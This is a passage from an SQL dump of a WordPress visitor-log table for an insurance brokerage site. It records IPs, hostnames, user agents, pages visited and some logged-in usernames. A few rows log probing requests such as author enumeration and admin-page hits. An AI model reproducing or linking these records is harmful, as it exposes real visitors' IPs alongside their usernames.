+http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(18897,'0b_52f7d6139021022b12964d047a9a023b','1461057062','185.2.65.25','65-25.colo.sta.blacknight.ie','/wp-admin/','Mozilla/5.0 (Windows; U; Windows NT 6.0; rv:15.0) Gecko/20121011 Firefox/15.0.2','','',0,'WinVista','Firefox 15','ua','','','','','','','0','0',0),(18900,'0b_050414352f2e568cf72558b3caf0743f','1461060058','52.29.202.189','ec2-52-29-202-189.eu-central-1.compute.amazonaws.com','/','','','',0,'','','','','','Unknown Spider','','','','0','0',0),(18902,'0b_ff502d7db79f8ed4793feeb5a6effad1','1461060766','130.185.155.74','130.185.155.74','/?author=1','Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)','','',0,'Win7','IE 9','','','','','','','','0','0',0),(18903,'0b_ff502d7db79f8ed4793feeb5a6effad1','1461060780','130.185.155.74','130.185.155.74','/author/admin/','Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)','','',0,'Win7','IE 9','','','','','','','','0','0',0),(18906,'0b_ff502d7db79f8ed4793feeb5a6effad1','1461060791','130.185.155.74','130.185.155.74','/?author=2','Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)','','',0,'Win7','IE 9','','','','','','','','0','0',0),(18909,'0b_346a5f527d2085d4b09b77ee1ebb6dca','1461064994','82.34.253.170','cpc81265-enfi21-2-0-cust425.20-2.cable.virginm.net','/','Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.112 Safari/537.36','https://www.google.co.uk/','_notprovided_',1,'Win8','Chrome 49','gb','','Google UK','','','','','0','0',0),(18912,'0b_346a5f527d2085d4b09b77ee1ebb6dca','1461064997','82.34.253.170','cpc81265-enfi21-2-0-cust425.20-2.cable.virginm.net','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.112 Safari/537.36','http://www.empireins.com/','',0,'Win8','Chrome 49','us','','','','','','','0','0',0),(18915,'0b_346a5f527d2085d4b09b77ee1ebb6dca','1461065223','82.34.253.170','cpc81265-enfi21-2-0-cust425.20-2.cable.virginm.net','/contact/','Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.112 Safari/537.36','http://www.empireins.com/','',0,'Win8','Chrome 49','us','1920 x 1080','','','','','','0','0',0),(18918,'0b_3449a82195f026529bf412cdd3d735fd','1461067570','188.165.206.188','ns311741.ip-188-165-206.eu','/','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:26.0) Gecko/20100101 Firefox/26.0','http://google.com','',0,'Linux','Firefox 26','eu','','','','','','','0','0',0),(18920,'0b_8c7434e0f67c6474527c239ee4398ec1','1461067967','157.55.39.25','msnbot-157-55-39-25.search.msn.com','/robots.txt','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(18921,'0b_8c7434e0f67c6474527c239ee4398ec1','1461067978','157.55.39.25','msnbot-157-55-39-25.search.msn.com','/','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(18923,'0b_a755feacee3781378cac1b72c1a87771','1461068255','107.152.186.125','107.152.186.125','/','Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36','','',0,'Win7','Chrome 41','','','','','','','','0','0',0),(18926,'0b_c5f1cfee5a98f180d450374ea098153e','1461069655','100.43.81.146','spider-100-43-81-146.yandex.com','/robots.txt','Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)','','',0,'','','','','','Yandex','','','','0','0',0),(18927,'0b_5d5a10b0332b09d491f3b734b86cd9ef','1461069655','141.8.143.235','spider-141-8-143-235.yandex.com','/robots.txt','Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)','','',0,'','','','','','Yandex','','','','0','0',0),(18930,'0b_5d5a10b0332b09d491f3b734b86cd9ef','1461069659','141.8.143.235','spider-141-8-143-235.yandex.com','/','Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)','','',0,'','','ru','','','Yandex','','','','0','0',0),(18932,'0b_c5f1cfee5a98f180d450374ea098153e','1461069659','100.43.81.146','spider-100-43-81-146.yandex.com','/','Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)','','',0,'','','ru','','','Yandex','','','','0','0',0),(18935,'0b_3040adaac2b6fe9ffe4df4408e32b94e','1461071267','157.55.39.25','msnbot-157-55-39-25.search.msn.com','/','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(18936,'0b_3719fdcb7ee44b35d4eea50e0444d46c','1461071413','108.58.88.178','ool-6c3a58b2.static.optonline.net','/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','','',0,'Win7 x64','IE 11','us','','','','','','','0','0',0),(18939,'0b_3719fdcb7ee44b35d4eea50e0444d46c','1461071414','108.58.88.178','ool-6c3a58b2.static.optonline.net','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/','',0,'Win7 x64','IE 11','us','','','','','','','0','0',0),(18942,'0b_ccd0fbbdb95d0dac2b68bbfe50a6f1b5','1461071467','54.174.44.34','ec2-54-174-44-34.compute-1.amazonaws.com','/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.95 Safari/537.36','','',0,'Win7','Chrome 28','us','','','','','','','0','0',0),(18944,'0b_29244303852579217792fe4658f16637','1461071814','108.58.88.178','ool-6c3a58b2.static.optonline.net','/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','','',0,'Win7 x64','IE 11','us','1536 x 864','','','','roisy','','0','0',0),(18945,'0b_29244303852579217792fe4658f16637','1461071815','108.58.88.178','ool-6c3a58b2.static.optonline.net','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/','',0,'Win7 x64','IE 11','us','1536 x 864','','','','roisy','','0','0',0),(18947,'0b_29244303852579217792fe4658f16637','1461071827','108.58.88.178','ool-6c3a58b2.static.optonline.net','/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','','',0,'Win7 x64','IE 11','us','1536 x 864','','','','roisy','','0','0',0),(18948,'0b_29244303852579217792fe4658f16637','1461071828','108.58.88.178','ool-6c3a58b2.static.optonline.net','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/','',0,'Win7 x64','IE 11','us','1536 x 864','','','','roisy','','0','0',0),(18951,'0b_29244303852579217792fe4658f16637','1461073366','108.58.88.178','ool-6c3a58b2.static.optonline.net','/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','','',0,'Win7 x64','IE 11','us','1536 x 864','','','','roisy','','0','51',0),(18954,'0b_29244303852579217792fe4658f16637','1461073367','108.58.88.178','ool-6c3a58b2.static.optonline.net','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/','',0,'Win7 x64','IE 11','us','1536 x 864','','','','roisy','','0','0',0),(18956,'0b_bcd5fb64bf879e18ec1381f3d93b4c51','1461074265','67.85.210.17','ool-4355d211.dyn.optonline.net','/','Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.112 Safari/537.36','','',0,'Win8','Chrome 49','us','','','','','','','0','0',0),(18957,'0b_bcd5fb64bf879e18ec1381f3d93b4c51','1461074265','67.85.210.17','ool-4355d211.dyn.optonline.net','/','Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.112 Safari/537.36','','',0,'Win8','Chrome 49','us','','','','','','','0','0',0),(18960,'0b_bcd5fb64bf879e18ec1381f3d93b4c51','1461074266','67.85.210.17','ool-4355d211.dyn.optonline.net','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.112 Safari/537.36','http://www.empireins.com/','',0,'Win8','Chrome 49','us','','','','','','','0','0',0),(18962,'0b_29244303852579217792fe4658f16637','1461074858','108.58.88.178','ool-6c3a58b2.static.optonline.net','/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','','',0,'Win7 x64','IE 11','us','1536 x 864','','','','roisy','','0','51',0),(18963,'0b_29244303852579217792fe4658f16637','1461074859','108.58.88.178','ool-6c3a58b2.static.optonline.net','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/','',0,'Win7 x64','IE 11','us','1536 x 864','','','','roisy','','0','0',0),(18965,'0b_6fe417cd0b27cf0cdc58548375877771','1461075874','192.227.244.66','192-227-244-66-host.colocrossing.com','/','Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36','http://www.empireins.com/','',0,'Win7','Google Chrome','us','','','','','','','0','0',0),(18968,'0b_29244303852579217792fe4658f16637','1461077992','108.58.88.178','ool-6c3a58b2.static.optonline.net','/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','','',0,'Win7 x64','IE 11','us','1536 x 864','','','','roisy','','0','0',0),(18969,'0b_7a379c87e079a1a4e7a594c58d73e858','1461078094','67.212.162.98','scan03.sitelock.com','/','Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/6.0)','http://www.google.com/url?url=www.empireins.com&yahoo.com','',0,'Win7 x64','IE 9','','','','','','','','0','0',0),(18971,'0b_7a379c87e079a1a4e7a594c58d73e858','1461078097','67.212.162.98','scan03.sitelock.com','/th1s_1s_a_4o4.html','Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/6.0)','http://www.google.com/url?url=www.empireins.com&yahoo.com','',0,'Win7 x64','IE 9','','','','','','','','0','0',0),(18974,'0b_7a379c87e079a1a4e7a594c58d73e858','1461078100','67.212.162.98','scan03.sitelock.com','/case-success-voya-turns-aviation-case-into-the-friendly-skies-for-218k-of-target/','Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/6.0)','http://www.google.com/url?url=www.empireins.com&yahoo.com','',0,'Win7 x64','IE 9','','','','','','','','0','0',0),(18977,'0b_7a379c87e079a1a4e7a594c58d73e858','1461078102','67.212.162.98','scan03.sitelock.com','/about-us/','Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/6.0)','http://www.google.com/url?url=www.empireins.com&yahoo.com','',0,'Win7 x64','IE 9','','','','','','','','0','0',0),(18980,'0b_7a379c87e079a1a4e7a594c58d73e858','1461078104','67.212.162.98','scan03.sitelock.com','/carriers/','Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/6.0)','http://www.google.com/url?url=www.empireins.com&yahoo.com','',0,'Win7 x64','IE 9','','','','','','','','0','0',0),(18981,'0b_7a379c87e079a1a4e7a594c58d73e858','1461078106','67.212.162.98','scan03.sitelock.com','/agent-tools/','Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/6.0)','http://www.google.com/url?url=www.empireins.com&yahoo.com','',0,'Win7 x64','IE 9','','','','','','','','0','0',0),(18984,'0b_7a379c87e079a1a4e7a594c58d73e858','1461078110','67.212.162.98','scan03.sitelock.com','/insentives/','Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/6.0)','http://www.google.com/url?url=www.empireins.com&yahoo.com','',0,'Win7 x64','IE 9','','','','','','','','0','0',0),(18987,'0b_7a379c87e079a1a4e7a594c58d73e858','1461078112','67.212.162.98','scan03.sitelock.com','/term-quotes/','Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/6.0)','http://www.google.com/url?url=www.empireins.com&yahoo.com','',0,'Win7 x64','IE 9','','','','','','','','0','0',0),(18990,'0b_c70000d0e32ce0921c3675edae3aaa0f','1461078235','108.58.88.178','ool-6c3a58b2.static.optonline.net','/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.112 Safari/537.36','','',0,'Win7','Chrome 49','us','','','','','','','0','0',0),(18993,'0b_c70000d0e32ce0921c3675edae3aaa0f','1461078236','108.58.88.178','ool-6c3a58b2.static.optonline.net','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.112 Safari/537.36','http://www.empireins.com/','',0,'Win7','Chrome 49','us','','','','','','','0','0',0),(18995,'0b_d96af6b0fe7bf4806b9167894cf75436','1461078452','178.162.205.28','178.162.205.28','/robots.txt','Mozilla/5.0 (Windows NT 6.3; WOW64; rv:39.0) Gecko/20100101 Firefox/39.0','','',0,'Win8 x64','Firefox 39','','','','Unknown Spider','','','','3','0',0),(18996,'0b_d96af6b0fe7bf4806b9167894cf75436','1461078462','178.162.205.28','178.162.205.28','/wp-admin/admin-ajax.php','Mozilla/5.0 (Windows NT 6.3; WOW64; rv:39.0) Gecko/20100101 Firefox/39.0','','',0,'Win8 x64','Firefox 39','','','','Unknown Spider','','','','3','0',0),(18999,'0b_c70000d0e32ce0921c3675edae3aaa0f','1461078650','108.58.88.178','ool-6c3a58b2.static.optonline.net','/forms/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.112 Safari/537.36','http://www.empireins.com/','',0,'Win7','Chrome 49','us','1920 x 1080','','','','','','0','0',0),(19002,'0b_bf71629f7cd6cbc6d8f7509e338c2b52','1461078793','207.46.13.57','msnbot-207-46-13-57.search.msn.com','/agent-tools/','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(19004,'0b_29244303852579217792fe4658f16637','1461079206','108.58.88.178','ool-6c3a58b2.static.optonline.net','/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','','',0,'Win7 x64','IE 11','us','1536 x 864','','','','roisy','','0','0',0),(19005,'0b_ffcdfe27e9ba118b7a6a41af86abcf75','1461079283','38.100.21.62','38.100.21.62','/','Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.2)','','',0,'Win2003','IE 7','','','','','','','','0','0',0),(19007,'0b_ffcdfe27e9ba118b7a6a41af86abcf75','1461079293','38.100.21.62','38.100.21.62','/feed/','Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.2)','','',0,'Win2003','IE 7','','','','','','','','0','0',0),(19010,'0b_ffcdfe27e9ba118b7a6a41af86abcf75','1461079303','38.100.21.62','38.100.21.62','/insentives/','Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.2)','','',0,'Win2003','IE 7','','','','','','','','0','0',0),(19011,'0b_ffcdfe27e9ba118b7a6a41af86abcf75','1461079313','38.100.21.62','38.100.21.62','/about-us/','Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.2)','','',0,'Win2003','IE 7','','','','','','','','0','0',0),(19014,'0b_ffcdfe27e9ba118b7a6a41af86abcf75','1461079323','38.100.21.62','38.100.21.62','/agent-tools/','Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.2)','','',0,'Win2003','IE 7','','','','','','','','0','0',0),(19016,'0b_ffcdfe27e9ba118b7a6a41af86abcf75','1461079333','38.100.21.62','38.100.21.62','/home/feed/','Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.2)','','',0,'Win2003','IE 7','','','','','','','','0','0',0),(19019,'0b_ffcdfe27e9ba118b7a6a41af86abcf75','1461079343','38.100.21.62','38.100.21.62','/case-success-companion-life-chronic-illness-rider-saves-ltc-decline/','Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.2)','','',0,'Win2003','IE 7','','','','','','','','0','0',0),(19022,'0b_ffcdfe27e9ba118b7a6a41af86abcf75','1461079352','38.100.21.62','38.100.21.62','/assets/js/google-code-prettify/prettify.css','Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.2)','','',0,'Win2003','IE 7','','','','','','','','0','0',0),(19025,'0b_ffcdfe27e9ba118b7a6a41af86abcf75','1461079362','38.100.21.62','38.100.21.62','/comments/feed/','Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.2)','','',0,'Win2003','IE 7','','','','','','','','0','0',0),(19028,'0b_d09689c6f1f37fbd8d6181b675fb1fa8','1461081674','108.58.88.178','ool-6c3a58b2.static.optonline.net','/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','','',0,'Win7 x64','IE 11','us','','','','','','','0','0',0),(19029,'0b_29244303852579217792fe4658f16637','1461082036','108.58.88.178','ool-6c3a58b2.static.optonline.net','/term-quotes/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/','',0,'Win7 x64','IE 11','us','1536 x 864','','','','roisy','','0','0',0),(19031,'0b_29244303852579217792fe4658f16637','1461082036','108.58.88.178','ool-6c3a58b2.static.optonline.net','/term-quotes/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/','',0,'Win7 x64','IE 11','us','1536 x 864','','','','roisy','','0','0',0),(19034,'0b_29244303852579217792fe4658f16637','1461082261','108.58.88.178','ool-6c3a58b2.static.optonline.net','/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/term-quotes/','',0,'Win7 x64','IE 11','us','1536 x 864','','','','roisy','','0','51',0),(19037,'0b_29244303852579217792fe4658f16637','1461082262','108.58.88.178','ool-6c3a58b2.static.optonline.net','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/','',0,'Win7 x64','IE 11','us','1536 x 864','','','','roisy','','0','0',0),(19040,'0b_29244303852579217792fe4658f16637','1461082265','108.58.88.178','ool-6c3a58b2.static.optonline.net','/forms/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/','',0,'Win7 x64','IE 11','us','1536 x 864','','','','roisy','','0','51',0),(19041,'0b_c21f0ba35482a57a3a96ac521d8d2913','1461082377','209.64.152.62','209.64.152.62','/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','http://www.bing.com/search?q=empire+inusracne+brokerage&src=IE-SearchBox&FORM=IENTTR&conversationid=','empire inusracne brokerage',1,'Win7 x64','IE 11','us','','Bing','','','','','0','0',0),(19044,'0b_c21f0ba35482a57a3a96ac521d8d2913','1461082404','209.64.152.62','209.64.152.62','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/','',0,'Win7 x64','IE 11','us','','','','','','','0','0',0),(19047,'0b_312b89c8da84f7d9a9132ad59814bb70','1461085191','180.76.15.135','baiduspider-180-76-15-135.crawl.baidu.com','/','Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)','','',0,'','','us','','','Baiduspider','','','','0','0',0),(19050,'0b_b947f709cc36ffd8fbb01f1102b1e8e2','1461086366','75.99.37.250','ool-4b6325fa.static.optonline.net','/term-quotes/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','','',0,'Win7 x64','IE 11','us','','','','','','','0','0',0),(19052,'0b_85407b77654a512acd4ee26ca1815ea5','1461086374','75.99.37.250','ool-4b6325fa.static.optonline.net','/term-quotes/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/term-quotes/','',0,'Win7 x64','IE 11','us','1680 x 1050','','','','SimkowitzCo','','0','0',0),(19053,'0b_b21e064aaa56ff7ca133bc470009f0fa','1461087324','66.249.64.34','crawl-66-249-64-34.googlebot.com','/robots.txt','Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)','','',0,'','','','','','Googlebot','','','','0','0',0),(19055,'0b_0b340554138780c45fa7bdfcd8ee60ee','1461090407','157.55.39.139','msnbot-157-55-39-139.search.msn.com','/prodmod-john-hancock-is-discontinuing-sale-of-ny-partnership-custom-care-iii-ltc-product/','Mozilla/5.0 (iPhone; CPU iPhone OS 7_0 like Mac OS X) AppleWebKit/537.51.1 (KHTML, like Gecko) Version/7.0 Mobile/11A465 Safari/9537.53 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'iPhone OS','','','','','BingBot','','','','0','0',0),(19056,'0b_6fe1866248d67e7f537b9792da85c6fe','1461091202','108.58.88.178','ool-6c3a58b2.static.optonline.net','/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.110 Safari/537.36','','',0,'Win7','Chrome 49','us','1920 x 1080','','','','','','0','0',0),(19059,'0b_6fe1866248d67e7f537b9792da85c6fe','1461091202','108.58.88.178','ool-6c3a58b2.static.optonline.net','/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.110 Safari/537.36','','',0,'Win7','Chrome 49','us','1920 x 1080','','','','','','0','0',0),(19061,'0b_6fe1866248d67e7f537b9792da85c6fe','1461091207','108.58.88.178','ool-6c3a58b2.static.optonline.net','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.110 Safari/537.36','http://www.empireins.com/','',0,'Win7','Chrome 49','us','1920 x 1080','','','','','','0','0',0),(19064,'0b_6fe1866248d67e7f537b9792da85c6fe','1461091211','108.58.88.178','ool-6c3a58b2.static.optonline.net','/agent-tools/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.110 Safari/537.36','http://www.empireins.com/','',0,'Win7','Chrome 49','us','1920 x 1080','','','','','','0','0',0),(19065,'0b_6fe1866248d67e7f537b9792da85c6fe','1461091226','108.58.88.178','ool-6c3a58b2.static.optonline.net','/underwriting-cheat-sheets/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.110 Safari/537.36','http://www.empireins.com/agent-tools/','',0,'Win7','Chrome 49','us','1920 x 1080','','','','Chaya','','0','51',0),(19067,'0b_29244303852579217792fe4658f16637','1461092192','108.58.88.178','ool-6c3a58b2.static.optonline.net','/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','','',0,'Win7 x64','IE 11','us','','','','','roisy','','0','0',0),(19068,'0b_29244303852579217792fe4658f16637','1461092194','108.58.88.178','ool-6c3a58b2.static.optonline.net','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/','',0,'Win7 x64','IE 11','us','','','','','roisy','','0','0',0),(19070,'0b_9c616b47b8eb3c54dbd7ff26da78f912','1461092955','66.249.64.67','crawl-66-249-64-67.googlebot.com','/robots.txt','Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)','','',0,'','','','','','Googlebot','','','','0','0',0),(19073,'0b_9c616b47b8eb3c54dbd7ff26da78f912','1461092957','66.249.64.62','crawl-66-249-64-62.googlebot.com','/apple-app-site-association','Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)','','',0,'','','','','','Googlebot','','','','0','0',0),(19076,'0b_dc2f24e8fcbbb55285f2bd6b262edede','1461093298','108.58.88.178','ool-6c3a58b2.static.optonline.net','/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.112 Safari/537.36','','',0,'Win7','Chrome 49','us','','','','','','','0','0',0),(19077,'0b_dc2f24e8fcbbb55285f2bd6b262edede','1461093300','108.58.88.178','ool-6c3a58b2.static.optonline.net','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.112 Safari/537.36','http://www.empireins.com/','',0,'Win7','Chrome 49','us','','','','','','','0','0',0),(19080,'0b_4bb755cf53e8458d25cda9243bb8f81a','1461094581','157.55.39.139','msnbot-157-55-39-139.search.msn.com','/main.html','Mozilla/5.0 (iPhone; CPU iPhone OS 7_0 like Mac OS X) AppleWebKit/537.51.1 (KHTML, like Gecko) Version/7.0 Mobile/11A465 Safari/9537.53 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'iPhone OS','','','','','BingBot','','','','0','0',0),(19083,'0b_849a842e299800f9c14096ad40a8f55e','1461094742','75.99.37.250','ool-4b6325fa.static.optonline.net','/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','','',0,'Win7 x64','IE 11','us','1920 x 1080','','','','','','0','0',0),(19085,'0b_849a842e299800f9c14096ad40a8f55e','1461094744','75.99.37.250','ool-4b6325fa.static.optonline.net','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/','',0,'Win7 x64','IE 11','us','1920 x 1080','','','','','','0','0',0),(19086,'0b_849a842e299800f9c14096ad40a8f55e','1461094756','75.99.37.250','ool-4b6325fa.static.optonline.net','/term-quotes/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','','',0,'Win7 x64','IE 11','us','1920 x 1080','','','','','','0','0',0),(19089,'0b_849a842e299800f9c14096ad40a8f55e','1461094766','75.99.37.250','ool-4b6325fa.static.optonline.net','/carriers/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/term-quotes/','',0,'Win7 x64','IE 11','us','1920 x 1080','','','','SimkowitzCo','','0','51',0),(19092,'0b_849a842e299800f9c14096ad40a8f55e','1461094777','75.99.37.250','ool-4b6325fa.static.optonline.net','/agent-tools/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/carriers/','',0,'Win7 x64','IE 11','us','1920 x 1080','','','','SimkowitzCo','','0','51',0),(19094,'0b_849a842e299800f9c14096ad40a8f55e','1461094787','75.99.37.250','ool-4b6325fa.static.optonline.net','/carrier-field-underwriting-guides/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/agent-tools/','',0,'Win7 x64','IE 11','us','1920 x 1080','','','','SimkowitzCo','','0','51',0),(19097,'0b_849a842e299800f9c14096ad40a8f55e','1461094803','75.99.37.250','ool-4b6325fa.static.optonline.net','/underwriting-cheat-sheets/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/agent-tools/','',0,'Win7 x64','IE 11','us','1920 x 1080','','','','SimkowitzCo','','0','51',0),(19098,'0b_849a842e299800f9c14096ad40a8f55e','1461094806','75.99.37.250','ool-4b6325fa.static.optonline.net','/underwriting-search/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/agent-tools/','',0,'Win7 x64','IE 11','us','1920 x 1080','','','','SimkowitzCo','','0','51',0),(19100,'0b_849a842e299800f9c14096ad40a8f55e','1461094874','75.99.37.250','ool-4b6325fa.static.optonline.net','/carrier-field-underwriting-guides/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/agent-tools/','',0,'Win7 x64','IE 11','us','1920 x 1080','','','','SimkowitzCo','','0','51',0),(19101,'0b_29244303852579217792fe4658f16637','1461094969','108.58.88.178','ool-6c3a58b2.static.optonline.net','/carriers/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/','',0,'Win7 x64','IE 11','us','1536 x 864','','','','roisy','','0','0',0),(19103,'0b_29244303852579217792fe4658f16637','1461094972','108.58.88.178','ool-6c3a58b2.static.optonline.net','/agent-tools/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/carriers/','',0,'Win7 x64','IE 11','us','1536 x 864','','','','roisy','','0','51',0),(19106,'0b_29244303852579217792fe4658f16637','1461094979','108.58.88.178','ool-6c3a58b2.static.optonline.net','/carrier-field-underwriting-guides/','Mozilla/5.0 (Windows NT 6.1; 